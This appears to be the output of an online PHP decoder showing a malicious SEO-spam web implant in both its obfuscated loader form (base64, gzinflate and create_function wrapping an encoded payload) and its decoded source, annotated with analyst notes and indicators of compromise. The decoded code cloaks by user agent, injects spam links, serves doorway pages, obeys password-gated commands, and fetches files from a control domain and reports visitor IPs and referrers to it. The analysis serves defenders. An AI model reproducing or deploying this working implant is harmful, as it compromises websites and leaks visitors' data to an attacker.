
PHP Decode

<?php $JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRT..

Decoded Output download

	  
 

	




	

	



// Removes PHP's execution time limit for this request, so the cURL fetches
// further down (each configured with a 3000-second timeout) are not cut short.
set_time_limit(0);

/**
 * Link-injection helper: splices the strings in $links into an HTML page.
 *
 * Analyst notes:
 *  - Every match of $reg in $page is collected, capture group $res is taken
 *    and de-duplicated. For as many pairs as both lists allow, one link is
 *    appended (after a single space) to the first literal occurrence of one
 *    matched fragment.
 *  - Links left over once the matches are used up are wrapped in a single
 *    <p>...</p>, joined with <br>, and inserted just before the first
 *    </body> tag (matched case-insensitively).
 *  - The visible callers invoke this only on the branch taken for crawler
 *    user agents, so the injected markup is absent from what an ordinary
 *    browser receives; compare a crawler-UA fetch against a normal fetch
 *    when checking a site for this infection.
 *
 * @param string $page  HTML to modify.
 * @param array  $links Strings to inject; consumed in order.
 * @param string $reg   PCRE pattern selecting the anchor fragments.
 * @param int    $res   Capture-group index of $reg to use as the fragment.
 * @return string The modified page.
 */
function change_page_regex($page, $links,$reg,$res){

	// Collect the unique fragments that will serve as insertion points.
	$elements = array();
	if (preg_match_all($reg, $page, $result)) {
		$elements = $result[$res];
		$elements = array_unique($elements);
	}


	// Only as many in-place injections as there are both links and fragments.
	$m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
		$link = array_shift($links);
		$element = array_shift($elements);
		// Fragment is quoted so it matches literally; '$0' keeps the original
		// text and the link follows it. Limit 1: first occurrence only.
		$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
	// $links was passed by value, so what remains here is the overflow.
	if (count($links)>0){
	        $element = "<p>";
	        $element .= implode("<br>
", $links);
	        $element .= "</p>";
		$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
	}
    
    
	return $page;
}




/**
 * Fetches $url with cURL and returns the body together with the transfer info.
 *
 * Analyst notes:
 *  - The default User-Agent is a fixed Chrome 60 / Windows 10 string, so
 *    outbound requests from the web server carrying exactly this UA are a
 *    usable network indicator.
 *  - CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are both set to 0:
 *    any certificate is accepted, so nothing fetched through this helper is
 *    authenticated.
 *  - CURLOPT_TIMEOUT is in seconds; 3000 lets one request hold a PHP worker
 *    for up to 50 minutes.
 *  - No error handling: $result is false when the transfer fails.
 *
 * @param string $url       URL to request.
 * @param string $useragent User-Agent header to send.
 * @return array [0] => response body (or false), [1] => curl_getinfo() array.
 */
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
	$ch = curl_init ();
	curl_setopt ($ch, CURLOPT_URL,$url);
	// Return the body as a string instead of printing it.
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
	// TLS certificate and host-name checks are switched off.
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
	$result = curl_exec ($ch);
	// Transfer metadata (content_type, http_code, redirect_url, ...) read by callers.
	$curly_page_get_info=curl_getinfo($ch);

	curl_close($ch);
	return array($result,$curly_page_get_info);
}

/**
 * Re-requests the URL currently being served (from the server to itself) and
 * replays the response's status, content type and redirect target as headers.
 *
 * Analyst notes:
 *  - The URL is rebuilt from the client-supplied Host header and REQUEST_URI,
 *    so the target of this server-side request is influenced by the client.
 *  - stripos() returns an int or false, never true, so the '=== true' test
 *    always fails and the self-request always uses http://.
 *  - 'status' in the condition below is a bare word, not $status. On PHP 8 an
 *    undefined constant raises an Error; on older versions it is treated as
 *    the string "status", which makes the test always pass.
 *  - Every infected page view that reaches this function therefore produces a
 *    second request from the server's own address using the fixed Chrome 60
 *    User-Agent of curly_page_get(); that pairing is visible in access logs.
 *
 * @return array [0] => fetched body (or false), [1] => its content type.
 */
function get_proxy_page(){
		
	// Never true (see above), so $proto is always 'http://'.
	$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
	$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
	list($buf,$curly_page_get_info)=curly_page_get($crurl);

	$ct=@$curly_page_get_info['content_type'];
	$nexturl=@$curly_page_get_info['redirect_url'];
	$status=@$curly_page_get_info['http_code'];
	// Bare word 'status', not the variable (see above).
	if (status!="")header("Status: $status");

	if ($ct!=""){
		header("Content-type: $ct");
	}
	if ($nexturl!=""){
		header("Location: $nexturl");
	}
	return array($buf,$ct);

}



// ---- Setup: working directory, per-host identifiers, on-disk artefacts ----
// Analyst summary of the indicators established in this section:
//  * a hidden directory named "." + md5(host without "www.") under the system
//    temp directory, or next to the infected file when that is unavailable;
//  * three files inside it with image names (emoji1.png, metaicons.jpg,
//    wp-themesall.gif) whose contents are read back with base64_decode() and
//    unserialize() further down, i.e. they are not images;
//  * POST parameters "pppp_check" (command selector) and "p" (password);
//  * a base64-hidden control domain, which decodes to t-fish-ka[.]ru
//    (defanged here).

// Prefer the system temp dir; fall back to the directory of this script.
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){	$tmppath = (dirname(__FILE__));	}	} else { $tmppath = (dirname(__FILE__));}

$content="";
// Command selector supplied by whoever controls the implant.
$x=@$_POST["pppp_check"];
// MD5 of the control password; compared against md5(base64_decode($_POST["p"])).
$md5pass="e5e4570182820af0a183ce1520afe43b";



// Host and URI come straight from the request; their hashes key the
// per-site directory and the per-URL config lookup.
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);



// Hidden (dot-prefixed) per-host directory; creation errors are suppressed.
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);



// $configs: map of md5(host+uri) => byte offset into $bd.
// $bd:      one base64/serialized record per line.
// $templ:   base64-encoded HTML template for doorway pages.
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";



// Control domain, stored base64-encoded to hide it from plain string searches.
$domain=base64_decode("dC1maXNoLWthLnJ1");
// Unsalted MD5 of the submitted password.
$p=md5(base64_decode(@$_POST["p"]));

// ---- Dispatcher ----
// Branch 1: authenticated operator command (POST pppp_check + p).
// Branch 2: ordinary traffic, cloaked by User-Agent / Referer.
// Note the loose '==' on the MD5 hex string: not a constant-time comparison
// and subject to PHP's numeric-string juggling.
if (($x!="")&&($p==$md5pass)){

	// Command "2": refresh the three data files from the control host over
	// plain HTTP. Response marker "###UPDATING_FILES###" is a usable
	// signature for proxy / WAF / IDS rules on outbound responses.
	if ($x=="2"){
		echo "###UPDATING_FILES###
";
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
		@file_put_contents($configs,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
		@file_put_contents($bd,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
		@file_put_contents($templ,$buf1);

		exit;
	}


	// Command "4": liveness check; replies with the marker "###WORKED###".
	if ($x=="4"){
		echo "###WORKED###
";exit;
	}


}else{

	// Load the URL => offset map. unserialize() runs on data that was
	// downloaded unauthenticated (HTTP, TLS checks disabled), so whoever
	// controls or intercepts that channel controls the deserialized input.
	$cf=array();
	if (@file_exists($configs)){
		$cf=@unserialize(base64_decode(@file_get_contents($configs)));
	}
	
	// Only URLs listed in the config are tampered with.
	if (@isset($cf[$md5urx])){
		$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
		// $se: visitor arrived from a search engine (matched on Referer).
		if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
		// $bot: request looks like a crawler (matched on User-Agent).
		if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
		// Byte offset of this URL's record inside $bd.
		$off=$cf[$md5urx]+0;
		// Read the template, then one line of $bd at $off and deserialize it.
		$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
		$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
		// Crawlers get SEO content: a doorway page or the real page with
		// extra links injected.
		if ($bot) {
			// Record-supplied response headers, one per line, emitted verbatim.
			if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

			if (isset($info["isdoor"])){

				if (isset($info["standalone"])){
					// Stand-alone doorway: the record carries the whole page.
					$doorcontent=base64_decode($text);
					echo $doorcontent;exit;
				}else{
					// Templated doorway: fill the placeholders and serve it.
					$template=str_replace("%text%",$text,$template);
					$template=str_replace("%title%",$title,$template);
					$template=str_replace("%description%",$description,$template);
					$template=str_replace("%uckeyword%",$uckeyword,$template);
					$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

					foreach($inside_links as $i => $link){
						$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
					}

					echo $template;exit;
				}
			}else{

				// Not a doorway: fetch the genuine page via a self-request and
				// inject links into it when it is HTML.
				list($buf,$ct)=get_proxy_page();

				if (stristr($ct,"text/html")){
					// links_a go after whole <a ...>...</a> elements.
					$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
					$links=$info["links_a"];
					$buf=change_page_regex($buf,$links,$rega,$resa);

					// links_p go after the last 30 characters before a </p>.
					$regp='/(.{30}\<\/p\>)/is';$resp=1;
					$links=$info["links_p"];
					$buf=change_page_regex($buf,$links,$regp,$resp);

				}

				// No exit here: execution continues to the $se check below.
				echo $buf;
			}



		}
		// Search-engine referrals on doorway URLs are answered with whatever
		// the control host returns. The request to ff.php leaks the visitor's
		// IP, Referer and the visited URL, and forwards the visitor's own
		// User-Agent. Outbound hits on /ff.php are a network indicator.
		if ($se) {
			if (isset($info["isdoor"])){
				list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
				echo $buf1;exit;
			}else{
				list($buf,$ct)=get_proxy_page();
				echo $buf;exit;
			}
		}
		// When neither $bot nor $se is set, this branch emits nothing itself.
	}else{

		// URL not listed in the config: pass the genuine page through.
		list($buf,$ct)=get_proxy_page();
		echo $buf;
	}

}


Original Code

<?php
// Obfuscated loader stage (analyst notes).
//  * $JZhEnyMgJg is a lookup alphabet; the four variables built from its
//    characters spell PHP function names: $BnaRTawe = base64_decode,
//    $lcQJOaDcf = gzinflate, $ZUXNhkOCO = error_reporting,
//    $UjyssRfWPVjYNJ = create_function. None of those names appears as a
//    literal, which defeats plain string searches for them.
//  * error_reporting(0) is called first to silence errors, then the payload
//    string is base64-decoded, inflated and compiled with create_function(),
//    and the resulting function is invoked.
//  * create_function() was removed in PHP 8.0, so this loader only executes
//    on older runtimes.
//  * Hunting hints taken from this structure: a long run of single-character
//    index concatenations from one variable, followed by a variable-function
//    call wrapping a large base64 literal.
$JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRTawe=$JZhEnyMgJg[7]. $JZhEnyMgJg[45] . $JZhEnyMgJg[0] . $JZhEnyMgJg[42] . $JZhEnyMgJg[54]. $JZhEnyMgJg[22]  .$JZhEnyMgJg[3]  .$JZhEnyMgJg[60].$JZhEnyMgJg[42]. $JZhEnyMgJg[58] .$JZhEnyMgJg[35] .$JZhEnyMgJg[60].$JZhEnyMgJg[42];$lcQJOaDcf=$JZhEnyMgJg[30] .$JZhEnyMgJg[41] . $JZhEnyMgJg[61] .$JZhEnyMgJg[33].$JZhEnyMgJg[20].  
$JZhEnyMgJg[4] .$JZhEnyMgJg[45].  
$JZhEnyMgJg[40] . $JZhEnyMgJg[42];$ZUXNhkOCO=$JZhEnyMgJg[42]. $JZhEnyMgJg[55]  .$JZhEnyMgJg[55].$JZhEnyMgJg[35].  $JZhEnyMgJg[55] . $JZhEnyMgJg[3].$JZhEnyMgJg[55] .$JZhEnyMgJg[42].  $JZhEnyMgJg[10]. $JZhEnyMgJg[35].$JZhEnyMgJg[55] . $JZhEnyMgJg[40] . $JZhEnyMgJg[61].  
$JZhEnyMgJg[33] .$JZhEnyMgJg[30];$UjyssRfWPVjYNJ=$JZhEnyMgJg[58]  .$JZhEnyMgJg[55].  
$JZhEnyMgJg[42].  
$JZhEnyMgJg[45].  $JZhEnyMgJg[40].$JZhEnyMgJg[42].  
$JZhEnyMgJg[3]  .$JZhEnyMgJg[20].  
$JZhEnyMgJg[14] .$JZhEnyMgJg[33] .$JZhEnyMgJg[58]. $JZhEnyMgJg[40].  $JZhEnyMgJg[61] .$JZhEnyMgJg[35]  .$JZhEnyMgJg[33];$ZUXNhkOCO(0);$CDCjFZrJolnsnM=$UjyssRfWPVjYNJ("",$lcQJOaDcf($BnaRTawe("vRhrV9s49nN6Tv+DxvUUe5s6SYFOT6kpTElbtrw2hO3uKRwfxVaIBr/GkgtMw3/feyXZsQPZtl8mHGzpvnRfurpyh5BH5PGjR53Hj+EJr0ePYfgI/wSTgeQJC2KecOn03S2ETss0lDxLSTij6SULcgqPgl2yG8fGcZfYMU+vRNcGID6E+w35OjaLWcJSKYhPaFHQWwcFdviUODmQBgmV4SygcewoTlJJAwllLF2XgJhOS4pBfcH3xdYyVq0RlCn/s2ROjVBr3mkDO3biJzx1wqxMpaPVdrtmVjNos4n5TbOCODYH+f0tAu83xE5w8OxZpSCKqZcXMz6tRbdUXCZpKdhRxgOJ8kzB8piGzFnrrRFPg/4sM7mwqksA5QIOXjC2+wQJ1aq1HwcouLLizji+Zfl2HyPVqWgailpv8m1r6yGc5xOe5HEWMcd6Mym2z1OrSgB3FYP1pmfErTLz/M15b5JFt+fbPQ4GWSAV7allIMTuW23bMKq4VPXsFEyWRappAG+C3s7hsohvdQpfMnAETLt2KVgBkFT61mH2F49j2tv0+sT5zNMouxbkaEwGfQ/CD4CXG1vk5uWGS3bzPGaf2eQTl73N9d+89ZfE+fRxfHjQJTG/YuQDC68yl7ybFVnCei+B31sfDF54g8E6OaVTWnDDZqkg2OEM3ILqBTzlkui9ouawLbMcIEDSJe/ORgfHJ+MAXl3U/jtko+H4bHQ0Hu0enb4fjirHraYf7x8Oj8/GXbLe7/e/Q3t6ehD8ezjaf//fkyHK/nH6j8en4+/Tn50OR7sfhkdAugiR4jF1oHIYu2Gh4tXIdozBndPMV3Qww0lFWS0explgNbtJIl2wzELdh2S6VYrVyYWYvMhuNKGj4tpBjQAoM1/IgueZcHbsACwDT3xZ0+/gZHQ8Pn53fLB20V2bSZkL2Nu+7xNZlIy8JRr2ugfV4LWe4FjbWoBivl7Aawj+OB6fBOjmtYsmeDT819nwFLNnf00V0JgL2AWTcvqwif7yflHrGefZofR3HmL7shZmqYRgBfI2Z3ohO2U3EnVdwVGwiBcslAEgDYeQVJZiFQO6IQihDmlqLG6a4RffstwZoxErHOtUgV4TI8wyqiM1qK9IVZQq+nda8eeoOHCF0qoqjeYxVtxnPMhCikkATIZmwdlOKe1sqTWpaxRKrxIJEhrCIpw1cSuUxZIleQD+WcND0ZZJnlOJ5WIZD0UD5fzChZpVlK77rdPgcgCX0oQ5QfB+/2AYBHDide46d4TFgpFv5DukSmXbRBj8AHbYNxCl4ATS7YuVwy8IZ1D9LAyMnUSbORXCt9gm29j8rT949eLViz6d9ung1XrIBps4YRvrE2ur8oU9ywSmVpW2Vp3NWmRZ8Ca2kdQar9hht9UHjHV9fe1ZXcvqKpxr9FJ08HYW0LK48dXMw1UMHQIVGQzchZbGTX418KyeZ3mVYJihRTvJVSsUC3bw4JRfigY7S7I/+MDL00vl1EnUwCVMUg4swvsj12gMetyguM6fyxmclwI6Ku+STxv+jLKE8tSfUMFebgQRC9XxHb0bJPQ/R9nBZzk7SP85UAlr58rUNukiuNaFaY8wzxz7Rm2Ep0+hE/T9KtSu6f/UhrnxfeuF2SssnGXEevLkydnJ3u54/+iDSqpTAMB5r9qDuhwNVtSjnaWCZJlqWOYRlQzdr20F7/MEiESvFZGGh3XbtTPlMbS0pQxMQgunCkxX6eH+LXq1o7tatUn0d2p1L6NWK6aScaGbivYNl83eu06HjeV0+Hw8+jTcM2mwxHaHRcncJ8Kpv3SP0KqYclkFz
tXikXynTKFx4DTmf0EWLyW14kVn3Qu969a1u1qIC6HOv+kXUxEuqmUmmfT7W7Zg+CzpvbqFbUyg+hioTtBQTO9RjIbQmw1HiE5ued6ubYfH42Gwu7c3svSNp319cqwnl1l2GbP5hKeX516YJfNEpHpAxZUZZLEZxJJ+BWfRuWC0CGfzWzrLsjmYHZVcahq45hWSFedeyuT8Ors2Qm+v2UQzaQBcBqPbEEq3nk7o5DbO9MJPuKWucVPXRbcM/q/el4I+Dwt6HbNivhuJ3zP5/IPGHEJLQHNQJmWFmGsgOPv5YTaByM1FzuHknQPEWKEFEtATrxdfObueQ3KD5UU5r1aYUB6VmlNrWVJQEkOotbSz6dRvRvlZX8NVgsOm8X8gixQtpJANoZ5mOUvVxrUK2D87U8HYlWNDCwArAQnsGB/6wgQEgRCBmEFf/1wkN80pkqpGtpnQbU1QlGsuk1fs9jorIsgk1SxZZo4Ztr+X0/CqxugpIlBaDcYJAiX0MjUQJwrIZbwgVTMER0yE0OFiB1MjGzAkKcNKszLEF9hrAMo+AXEJ1F2yFtAENnYAhszcv9XcbE/NYyKBPRyeV9/sBmA5fg+ygIkwED67MTddvOU2pbhb06xgFPJYUxIqiP2VxrAWPHVA1Rz6MTVoNqUacXeny+R99bmIsqywLqpz9CEa2MJpRGHDMasqRPCzkbHqzJbsxODp7OiY0tukrssu/KqSq0XWid9qqH5Fcb+CU/DdrYnqBVayYbIoPhz8BGMjkZC9Mf0JIXX6oYh68hMCFuwtOIFKAu1ll+jAVynttiUb2XXmNFNbJRAn/rb+llJHdKUm+0en+3vD4GD/6FMAhzb3LLRJfQC6b85dvbgOfEXQirp6NY7bTqd1O5Suv3y/3WqmJ95u4R+vVV1VKXozmcAlaJGcUPypj9966Lnw/vH2fBsfb857VH31waNRUL9fh0DXAZPvahJQUwEQjYXzgS+SStnF90iqPkjShvsRmoMajvdtvX+H6+fn226PC61Bbg6CFRrkP61BrjTIFxrUwdCxAHItsb4KmlioMifYyirXKhOtaK1qB1d0g6YJ7E2nXj7L30IDAgmlzwXPeppcwRROT+BlqS4lVX4DVh0ay3gEIjK6h1H3LMCU9zB4tQIEjaICl8c+CKbYLS1TYl/RxXN7a8mNg0Y6N2vY97O4HY2GlCoYzW3xI+Jaob0zF/3/AQ==")));$CDCjFZrJolnsnM();?>

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1
error_reporting 1

Variables

$BnaRTawe base64_decode
$ZUXNhkOCO error_reporting
$lcQJOaDcf gzinflate
$JZhEnyMgJg svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcw..
$CDCjFZrJolnsnM None
$UjyssRfWPVjYNJ create_function

Stats

MD5 688d3e2391942fcc8965ce9dac36dd9b
Eval Count 1
Decode Time 86 ms